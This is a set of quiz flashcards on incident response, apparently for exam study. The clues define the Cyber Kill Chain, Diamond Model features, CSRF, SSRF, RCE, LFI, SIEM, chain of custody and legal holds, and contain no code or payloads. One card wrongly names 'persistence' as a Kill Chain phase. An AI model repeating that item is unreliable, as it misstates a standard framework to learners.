This type of exercise involves simulating an incident to test the effectiveness of the incident response plan.
What is a tabletop exercise?
This phase of the Cyber Kill Chain involves the attacker gaining initial access to the target network.
What is the exploitation phase?
This type of attack forces an end user to execute unwanted actions on a web application in which they are authenticated.
What is CSRF (Cross-Site Request Forgery)?
This process involves examining the behavior of an actor, including the tools they use and the methods they employ.
What are TTPs (Tactics, Techniques, and Procedures)?
This process ensures that evidence is collected, preserved, and documented in a manner that maintains its integrity.
What is chain of custody?
These predefined procedures guide the response to specific types of incidents.
What are playbooks?
This phase of the Cyber Kill Chain involves the attacker maintaining access to the target system over an extended period.
What is the persistence phase?
These artifacts indicate a potential intrusion and are used to detect malicious activity.
What are Indicators of Compromise (IoCs)?
This process involves verifying that data has not been altered or tampered with.
What is validating data integrity?
This legal process requires organizations to preserve relevant information for potential litigation.
What is a legal hold?
This analysis identifies the underlying cause of an incident to prevent future occurrences.
What is root cause analysis? Part of the Post-Incident process to prepare for future incidents.
In the Diamond Model, this feature represents the tools and techniques used by the adversary to conduct an attack.
What is capability?
This step involves determining the extent of an incident and its impact on the organization.
What is scoping?
This step involves removing malicious components from affected systems.
What is remediation?
This type of system collects and analyzes security event data from various sources to provide real-time analysis of security alerts.
What is a Security Information and Event Management (SIEM)?
These plans ensure that critical business functions can continue during and after a disaster.
What are business continuity (BC) and disaster recovery (DR) plans?
In the Diamond Model, this feature represents the infrastructure used by the adversary to deliver the capability to the victim.
What is infrastructure?
This type of attack tricks a server into fetching a resource on behalf of the attacker.
What is SSRF (Server-Side Request Forgery)?
This process ensures files are not tampered with by monitoring and reporting changes to files.
What is FIM (File Integrity Monitoring)?
This process involves collecting and processing log data from various sources to provide insights into system and network activities.
What is log ingestion?
This guide provides a framework for testing the security of web applications.
What is the OWASP Testing Guide?
This model uses four core features—adversary, capability, infrastructure, and victim—to analyze cyber intrusions.
What is the Diamond Model of Intrusion Analysis?
This type of attack allows an attacker to execute arbitrary code on a remote machine.
What is RCE (Remote Code Execution)?
This type of attack allows an attacker to include files on a server through the web browser.
What is LFI (Local File Inclusion)?
This logging level captures detailed information, including debugging messages, and is typically used during development.
What is debug level logging?